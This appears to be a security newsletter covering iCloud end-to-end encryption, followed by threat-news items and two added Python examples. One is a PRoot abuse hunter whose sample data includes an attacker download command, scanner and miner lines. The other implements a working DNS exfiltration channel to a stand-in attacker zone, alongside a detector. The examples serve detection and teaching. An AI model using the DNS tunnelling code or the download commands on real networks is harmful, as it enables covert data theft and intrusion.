Apple beefs up iCloud Encryption
The move could frustrate law enforcement efforts to access criminal evidence
Apple has long touted the privacy benefits of its platform, stating “what happens on your iPhone, stays on your iPhone.”
But this mantra had a crucial caveat: it only held if users opted not to back up their personal data to iCloud. Otherwise Apple held the encryption keys for the backed-up content, and those keys could be used to extract messages, photos, and other documents should law enforcement come knocking on its doors.
Not anymore. Apple last week moved to close this gap by introducing end-to-end encryption for iCloud backups, photos, and chat histories, a key security upgrade that puts the data out of reach of hackers, law enforcement, and even malicious insiders at Apple, because Apple no longer holds the keys.
Advanced Data Protection, as the new optional setting is called, can only be turned on once the user has set up an alternative recovery method (a recovery contact or a recovery key), since Apple can no longer reset access on the user’s behalf. The flip side is a steep penalty: a user who loses their devices and that recovery method has lost the encrypted data for good, as Apple doesn’t have the keys in its possession.
The changes are likely to heighten conflict between Apple and government agencies, who have decried the lack of access to digital evidence owing to broadening encryption barriers. The FBI said it was “deeply concerned with the threat end-to-end and user-only-access encryption pose.”
In tandem with the new security features, Apple said it’s fully abandoning its controversial proposal to scan photos stored in iCloud for child sexual abuse material (CSAM).
Apple’s new protections are part of a broader push by tech companies to improve customer security. Google recently introduced end-to-end encryption for group chats in its Messages app for Android, and Meta’s WhatsApp started offering encrypted chat backups a year ago.
What’s trending in security?
📷 Anker’s Eufy cameras have been found to harbor several issues, chief among them uploading footage that was supposed to stay local to the cloud without the user’s authorization or knowledge. On top of that, camera streams can be viewed in VLC without authentication by anyone who obtains the camera’s unique Eufy server URL. The good news is that there’s no evidence yet of this being exploited in the wild. [The Verge]
🌐 A residential proxy service known as BlackProxies is becoming increasingly popular among threat actors looking to hide the originating IP address from which they conduct their operations. It claims to offer over one million residential and other proxy IP addresses “from all around the world”. Residential proxies are ideal for blending into regular website traffic, because the requests arrive from IP addresses assigned to ordinary ISP customers rather than from data centers. The service costs $14/day, $39/week, or $89 per month. The development comes as a new malware-as-a-service (MaaS) operation named DuckLogs has emerged, giving low-skilled attackers easy access to modules for stealing information, logging keystrokes, grabbing clipboard data, and remotely accessing the compromised host. [DomainTools / Cyble]
⚠️ A vulnerability identified in the command-and-control (C2) servers of the Mars Stealer malware can be used to delete data collected from infected users, terminate connections to infected systems, and even lock Mars operators out of their own servers by scrambling their admin passwords. The same issue is also present in servers for the Erbium malware. [TechCrunch]
💰 A leak of the internal chats from the Yanluowang ransomware gang, comprising over 2,700 messages, has revealed ties between members of the Yanluowang gang and members of other ransomware operations such as Babuk, Conti, and HelloKitty. [Trellix / The Record]
🚩 Threat intelligence company VulnCheck has detailed seven vulnerabilities in Xiongmai IoT devices, five of which have been exploited in the wild. According to researcher Jacob Baines, there are around 200,000 devices connected to the internet, making them a lucrative target. [VulnCheck]
🎣 A spear-phishing operation carried out by the China-linked Mustang Panda group deployed the Claimloader trojan on infected systems. [LAC]
🌺 An East Asian APT group called Tiger Hibiscus has been linked to a new set of attacks called Operation ShadowTiger that took place from 2019 to 2021 and involved the use of spear-phishing, browser and intranet zero-days, and an intranet watering-hole attack. [QiAnXin]
🪷 In another report, the same Chinese cybersecurity company shed light on new attacks mounted by OceanLotus (aka APT32), a Vietnamese state-sponsored group, targeting Chinese entities through the exploitation of zero-day flaws. [QiAnXin]
💵 In what could be a new trend, companies hit by purported ransomware may no longer have the option to pay a ransom. Threat actors are dabbling with programs that look like ransomware, encrypting files and demanding payment, but are actually designed to irrevocably overwrite the contents of a victim’s files. These camouflaged data wipers have surged since the onset of the Russo-Ukrainian war this year. The practical lesson for defenders is that a ransom note is no guarantee that decryption is even possible, which makes tested offline backups the only reliable recovery path. [The Hacker News]
🔝 An analysis of top 100 sites in 25 countries has revealed that websites from Hong Kong have 45 trackers on average, followed by 33 in Singapore and 23 in the U.S. Austria, Denmark, and Sweden, in contrast, have only 11 trackers, with websites in the U.K., France, and Spain having roughly 18 trackers per website. [NordVPN]
🗄️ Stolen data belonging to five million people globally, including 600,000 Indians, has been sold on the Genesis, Russian, and 2easy bot markets for about $6 on average. In related research, academics from the University of South Florida and Georgia State University found that 30 darknet marketplaces recorded 632,207 sales between September 1, 2020, and April 30, 2021, netting $140,337,999 in total revenue; on average, a marketplace had 26,342 sales and generated $5,847,417 in revenue. [NordVPN / Ars Technica]
⬇️ Threat actors are leveraging an open source tool called PRoot to expand the scope of their operations to multiple Linux distributions, such as Ubuntu, Fedora, and Alpine. The attacks, dubbed BYOF (Bring Your Own Filesystem), entail using the legitimate utility to build a malicious filesystem that contains the toolset needed to conduct attacks (masscan, nmap, and the XMRig cryptominer), which is then unpacked and run with PRoot on already compromised systems. Because PRoot is a user-space chroot and mount emulator, the bundled binaries run against the bundled root filesystem regardless of what the host has installed, and no root privileges are needed. “Using PRoot, there is little regard or concern for the target’s architecture or distribution since the tool smoothes out the attack struggles often associated with executable compatibility, environment setup, and malware and/or miner execution,” Sysdig said. “It allows attackers to get closer to the philosophy of 'write once, run everywhere,' which is a long sought-after goal.” [Sysdig]
🔻 Misconfigured Domain Name System (DNS) deployments in enterprise environments can expose air-gapped networks, and the high-value assets they are meant to protect, to external threat actors. The attack uses DNS queries as a command-and-control (C2) channel: a host on the isolated segment has no route to the Internet, but if the internal DNS server it relies on forwards queries it cannot answer out to Internet resolvers, the attacker’s authoritative name server receives whatever the host encodes into query names and can hand back commands in the responses. The practical check is whether a host on the isolated segment can resolve an arbitrary external name at all; if it can, the segment is not air-gapped for DNS, and the resolver serving it should be configured not to recurse or forward to the Internet. [Pentera]
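The two items above both come down to spotting attacker activity on a host or in a log. As an added illustration that is not Sysdig’s or Pentera’s own code, the first block below hunts for BYOF-style PRoot use in a process snapshot; the process list, the 203.0.113.10 address (a TEST-NET-3 documentation address), and the paths are constructed for the example, and the watch list of tools is the one named in the Sysdig write-up.

```python
"""Hunt for PRoot "Bring Your Own Filesystem" abuse in a process snapshot.

Added example; not Sysdig's detection logic. The snapshot below is constructed.
"""
import os
import shlex
from dataclasses import dataclass, field

# Where a dropped rootfs is more likely to land than a legitimately built one
SUSPICIOUS_ROOTFS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Tooling named in the Sysdig write-up; extend with your own watch list
KNOWN_TOOLING = {"masscan", "nmap", "xmrig"}
# PRoot options that select the guest root filesystem
ROOTFS_FLAGS = ("-r", "-S", "-R", "--rootfs")


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    cmdline: str


@dataclass
class Finding:
    pid: int
    rootfs: str
    tooling: list = field(default_factory=list)
    severity: str = "low"


def _argv(cmdline: str) -> list:
    try:
        return shlex.split(cmdline)
    except ValueError:          # unbalanced quotes; treat the line as opaque
        return []


def proot_rootfs(cmdline: str):
    """Return the guest rootfs of a proot command line, or None if it is not proot."""
    argv = _argv(cmdline)
    if not argv or os.path.basename(argv[0]) != "proot":
        return None
    for i, arg in enumerate(argv[1:], start=1):
        if arg in ROOTFS_FLAGS and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("--rootfs="):
            return arg.split("=", 1)[1]
    return None                 # e.g. 'proot --help'


def descendants(pid: int, children: dict):
    """Yield every process below pid in the process tree."""
    stack = list(children.get(pid, []))
    while stack:
        p = stack.pop()
        yield p
        stack.extend(children.get(p.pid, []))


def find_byof_candidates(procs):
    """Flag proot invocations, rated by where the rootfs lives and what runs inside it."""
    children = {}
    for p in procs:
        children.setdefault(p.ppid, []).append(p)
    findings = []
    for p in procs:
        rootfs = proot_rootfs(p.cmdline)
        if rootfs is None:
            continue
        f = Finding(pid=p.pid, rootfs=rootfs)
        names = []
        for d in sorted(descendants(p.pid, children), key=lambda d: d.pid):
            argv = _argv(d.cmdline)
            if argv:
                names.append(os.path.basename(argv[0]))
        f.tooling = [n for n in names if n in KNOWN_TOOLING]
        if f.tooling or rootfs.startswith(SUSPICIOUS_ROOTFS_DIRS):
            f.severity = "high"
        findings.append(f)
    return findings


# Constructed snapshot in the shape of `ps -eo pid,ppid,args`; 203.0.113.10 is a
# documentation (TEST-NET-3) address standing in for the attacker's download host.
SAMPLE_PROCESSES = [
    Proc(1, 0, "/sbin/init"),
    Proc(812, 1, "sshd: deploy [priv]"),
    Proc(2301, 812, "-bash"),
    Proc(2345, 2301, "curl -sSL http://203.0.113.10/Proot.tar.gz -o /tmp/Proot.tar.gz"),
    Proc(2350, 2301, "/tmp/Proot/proot -S /tmp/Proot/rootfs /bin/bash"),
    Proc(2360, 2350, "/bin/bash"),
    Proc(2371, 2360, "masscan -p22 10.0.0.0/8 --rate 10000"),
    Proc(2372, 2360, "xmrig -o pool.example:3333 -k"),
    Proc(3000, 1, "proot -r /opt/builds/alpine-rootfs /bin/sh -c make"),  # CI build, legitimate
    Proc(3001, 3000, "/bin/sh -c make"),
]

if __name__ == "__main__":
    for f in find_byof_candidates(SAMPLE_PROCESSES):
        print(f"[{f.severity}] pid={f.pid} rootfs={f.rootfs} tooling={f.tooling}")
```

Feed it the output of `ps -eo pid,ppid,args` (or the equivalent from your EDR) and it reports every PRoot process, rating the ones whose root filesystem sits in a scratch directory or that have scanners or miners running beneath them as high. The legitimate CI-style invocation in the sample is reported at low severity rather than suppressed, which is the right default: PRoot has real uses, so the hunt should surface it and let context decide.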
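To make the DNS C2 mechanism concrete, the following added example (not Pentera’s tooling) shows both ends of the channel and a resolver-side detector: the client encodes data into query names under a zone the attacker controls, the attacker’s authoritative server reassembles it from the names it logs, and a detector over resolver logs flags clients sending many long, high-entropy names under one domain. The zone name attacker-c2.example, the 10.20.0.0/16 addresses, the payload, and the log format are all constructed for the example.

```python
"""DNS as a C2/exfiltration channel out of a segment with no Internet route.

Added example, not Pentera's tooling. attacker-c2.example, the 10.20.0.0/16
clients, the payload and the resolver-log format are all constructed.
"""
import base64
import math
from collections import Counter, defaultdict

C2_DOMAIN = "attacker-c2.example"   # zone the attacker is authoritative for (placeholder)
CHUNK = 30                          # 30 bytes -> 48 base32 chars, under the 63-char label limit


def encode_for_dns(data: bytes, domain: str = C2_DOMAIN) -> list:
    """Client side: split data into <seq>.<base32 chunk>.<domain> query names.

    base32 is used because DNS names are case-insensitive, so base64 would not survive.
    """
    names = []
    for seq, off in enumerate(range(0, len(data), CHUNK)):
        piece = base64.b32encode(data[off:off + CHUNK]).decode().rstrip("=").lower()
        names.append(f"{seq}.{piece}.{domain}")
    return names


def decode_from_dns(names, domain: str = C2_DOMAIN) -> bytes:
    """Server side: reassemble the payload from the names the authoritative server saw."""
    suffix = "." + domain
    chunks = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        seq, piece = name[:-len(suffix)].split(".", 1)
        piece = piece.upper()
        piece += "=" * (-len(piece) % 8)    # restore the base32 padding the client stripped
        chunks[int(seq)] = base64.b32decode(piece)
    return b"".join(chunks[k] for k in sorted(chunks))   # order by sequence, not arrival


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname: str) -> str:
    # Two-label approximation; use a public-suffix list in production
    return ".".join(qname.split(".")[-2:])


def flag_tunnel_queries(lines, min_queries=4, min_label_len=20, min_entropy=2.5):
    """Resolver-log detector: (client, domain) pairs with many long, high-entropy unique names.

    Each line is '<timestamp> <client-ip> <qname> <qtype>' (constructed format).
    A single long hostname is not enough; the tunnel shows up as a stream of them.
    """
    suspicious = defaultdict(set)
    for line in lines:
        _, client, qname, _ = line.split()
        qname = qname.rstrip(".").lower()
        longest = max(qname.split("."), key=len)
        if len(longest) >= min_label_len and shannon_entropy(longest) >= min_entropy:
            suspicious[(client, registered_domain(qname))].add(qname)
    return {k: len(v) for k, v in suspicious.items() if len(v) >= min_queries}


# Constructed payload: what a foothold on the isolated segment might send out
PAYLOAD = (b"uid=1000(svc) gid=1000(svc) groups=1000(svc),27(sudo)\n"
           b"hostname=build-01.corp.example\n"
           b"/etc/hosts: 127.0.0.1 localhost, 10.20.0.1 gateway\n"
           b"note=segment has no default route, dns still resolves\n")

# Constructed resolver log: ordinary traffic plus the tunnel from 10.20.0.42
BENIGN_LOG = [
    "2022-12-05T10:00:01Z 10.20.0.15 www.example.com A",
    "2022-12-05T10:00:02Z 10.20.0.15 mail.example.com MX",
    "2022-12-05T10:00:03Z 10.20.0.15 cdn.example.net A",
    "2022-12-05T10:00:04Z 10.20.0.15 a-very-long-but-legitimate-hostname.corp.example.com A",
    "2022-12-05T10:00:05Z 10.20.0.16 updates.example.org A",
]
TUNNEL_LOG = [f"2022-12-05T10:01:{i:02d}Z 10.20.0.42 {name} TXT"
              for i, name in enumerate(encode_for_dns(PAYLOAD))]
SAMPLE_LOG = BENIGN_LOG + TUNNEL_LOG

if __name__ == "__main__":
    print(f"{len(TUNNEL_LOG)} queries carry {len(PAYLOAD)} bytes to {C2_DOMAIN}")
    print("flagged:", flag_tunnel_queries(SAMPLE_LOG))
```

The detector keys on the pair of client and registered domain rather than on individual queries, which is why the one long but legitimate hostname in the benign log is not reported while the tunnel is. Thresholds are starting points: tune `min_queries` to your resolver’s normal per-client fan-out, and remember that none of this matters if the resolver serving the isolated segment simply refuses to forward to the Internet.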
✉️ Cybercrime marketplaces are selling stolen corporate email access for U.S.-based companies for as low as $2 to fill a growing demand by hackers who use them for business email compromise and phishing attacks or initial access to networks for stealing sensitive information. Ransomware operators have also been observed offering email access to a Canadian aerospace company for $15,000. These credentials are obtained through brute-force attacks, deploying information stealers, or credential stuffing. [Bleeping Computer]
💲 North Korean IT workers are taking up freelancing jobs by presenting themselves as non-North Korean nationals to earn money that the nation’s authoritarian government uses to finance the development of missiles and nuclear weapons for the regime. “DPRK IT workers favor online text-based chat instead of video interviews,” South Korea’s Ministry of Science and ICT (MSIT) warned. “DPRK IT workers are highly skilled when it comes to software development, and some of them are proficient in foreign languages, including English.” [MSIT]
🔗 New research has found a third-party service dubbed Zombinder that provides the “glue” to bind malicious capabilities to legitimate Android apps. It’s offered on the darknet by an “actor well-known in the threat landscape”. The service is being used by banking trojans such as ERMAC, SOVA, and Xenomorph. [The Hacker News]
🔏 Google shed more light on Private Compute Core (PCC), an open source component that sandboxes machine learning features locally on Android devices and isolates the information from being sent and processed in the cloud. “PCC is designed to enable innovative features while keeping the data needed for them confidential from other subsystems” by limiting Interprocess Communications (IPC) binds and using isolated processes, the tech giant said. [Google Security Blog]
🚨 Platform certificates are the keys that OEMs such as Samsung, LG, and MediaTek use to sign the Android system image itself, and an app signed with one can request to run under the same highly privileged system user as the OS. Several such certificates have been found to have been used to sign malicious Android apps, potentially granting them elevated privileges to harvest sensitive information from compromised devices without ever having to ask for users’ consent. That is what makes the abuse insidious: Android malware traditionally has to trick users into granting it intrusive permissions before it can carry out its malicious activities. [The Hacker News]
⬆️ Keeping track of the various names that different cybersecurity companies give to the same threat actor can be quite the task. But here's a quick primer to get you started. [Chad Warner / Florian Roth]